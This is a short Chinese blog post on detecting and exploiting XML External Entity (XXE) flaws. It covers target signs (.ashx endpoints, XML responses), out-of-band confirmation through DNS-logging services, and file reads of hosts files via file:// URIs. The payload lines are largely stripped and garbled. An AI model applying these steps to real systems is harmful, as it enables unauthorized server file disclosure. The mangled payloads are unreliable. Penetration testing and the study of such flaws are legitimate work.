首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

XXE验证与利用流程

作者:活宝贝aaaaa日记_452 | 来源:互联网 | 2023-09-18 20:30
特征特征1.ashx看到url是.ashx后缀的特征2响应体是xml发现有这些特征都可以用下面的流程测试测试在线工具:我这里用举例pyload把替换成你`然后,查看到有记录就说明6

特征

  • 特征1 --- .ashx
    看到url是 .ashx后缀的
    技术分享图片



  • 特征2 --- 响应体是xml
    技术分享图片



发现有这些特征都可以用下面的流程测试


测试

在线工具:

http://ceye.io/
http://www.dnslog.cn/

我这里用www.dnslog.cn举例


pyload

http://127.0.0.1:80替换成你的Get SubDomain



%xxe; ]>
# or



]>
&sp;

然后点Refresh Record,有访问记录就说明666了。
技术分享图片


任意读取文件测试

原理就是构造一个可以访问系统默认文件hosts的Pyload,然后看看响应,看他说缺啥补充啥。如果是回显型XXE就会将配置文件的信息打印出来。

file:///c:/windows/system32/drivers/etc/hosts
file:///etc/hosts

# pyload



]>
&sp;
# response
1790112020-04-09 16:58:34.877
# pyload



]>
&sp;
# response
1770002020-04-09 17:01:08.121


推荐阅读
  • php

    .NET Web应用程序安装包的制作经历:Sql数据库安装的3种方式

    .NET Web应用程序安装包的制作经历:Sql数据库安装的3种方式
    一次难得的安装包制作经历,因为之前从没有制作过安装包,那就免不了遇到问题,在摸索和学习中获得了不少宝贵经验,在这里我将用图文并茂的形式详细描述一下流程及主要难点问题的解决方法,希望 ... [详细]
  • php

    实现AOP功能的封装与配置的小框架

    内容java基础巩固笔记-实现AOP功能的封装与配置的小框架设计(目录):XXXjava.util.ArrayList中代码Advice接口MyAdvice类BeanFactory ... [详细]
  • php

    Protocol Buffer Java实例

    大家要先下载protobuffer,在这里:https:code.google.compprotobufdownloadslist注意,需要下载两个,一个是complier,另外一 ... [详细]
  • php

    操作系统原理之I/O设备管理(第六章上半部分下)

    操作系统原理之I/O设备管理(第六章上半部分下)
    中断处理程序的作?:IO中断处理程序的作?是将发出IO请求?被 ... [详细]
  • php

    python之基础篇(八)——模块与包

    python之基础篇(八)——模块与包
    防伪码:忘情公子著python中的模块将代码量较大的程序分割成多个有组织的、彼此独立但又能互相交互的代码片段,这些自我包含的有组织的代码段就是模块。模块在物理形式上表现为以.py结 ... [详细]
  • php

    Pacemaker集群管理 实现DRBD存储及应用高可用

    本次实验目的,使用Pacemaker实现DRBD存储及应用高可用?实验环境:系统版本:CentOSrelease6.5(Final)_x64node1:ip:192.168.0.2 ... [详细]
  • php

    hdu 1269 强连通+并查集

    这是一道典型的强连通的题目。 所谓强连通,就是对于一个有向图,若一个集合内任意2点都能过互相达,于是这个几何就是一个强连通分量。 对于任意图,都可以分解人多个不相交的强连通集合。  ... [详细]
  • post

    PYTHON实现DISCUZ论坛的自动POST登录发贴回帖

    #-*-coding:utf-8-*-importurllib2,urllib,cookielibimportreimportgetpassimportsqlite3impor ... [详细]
  • post

    基于Nodejs的大文件上传之断点续传

    接着《扒一扒Nodejsformidable的onPart》和《也说文件上传之兼容IE789的进度条丢掉flash》;前面已完成兼容IE789的大文件上传:无flash的低版本进度 ... [详细]
  • php

    互联网java面试宝典

    答题:消息队列的核心功能就是:解耦合,异步,流量削峰解耦:接口调用发送,那如果E系统也要这个数据呢?那如果C系统现在不需要了呢?现在A系统又要发送第二种数据了呢?A系统负责人濒临崩 ... [详细]
  • php

    cURL入门

    cURL是一个利用URL语法规定来传输文件和数据的工具,支持很多协议,如HTTP、FTP、TELNET等。最爽的是,PHP也支持cURL库。本文将介绍cURL的一些高级特性,以 ... [详细]
  • php

    四年JAVA转Go

    J ... [详细]
  • php

    httprunner 3.X学习

    httprunner3.X相比httprunner2.X系统中会新增4个命令:httprunner:核心命令hrun:httprunner的缩写,功能与httprunner完全相同 ... [详细]
  • php

    2.2 与球体相交几何解

    2.2 与球体相交几何解
    现在,一个简单的球体相交例子已经被概述。这里有一些关于计算效率的概念。一个普遍的看法是,应该尽可能地避免使用平方根函数。检查计时:sqrt()耗时通常是乘法的15~30倍。类似的, ... [详细]
  • php

    编程之美之斐波那契数列

    编程之美之斐波那契数列
    【背景】【思路1-递归】[cpp]viewplaincopyintFibonacci(intn){if(n#include#includeusingnamespacestd;矩 ... [详细]
author-avatar
活宝贝aaaaa日记_452
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有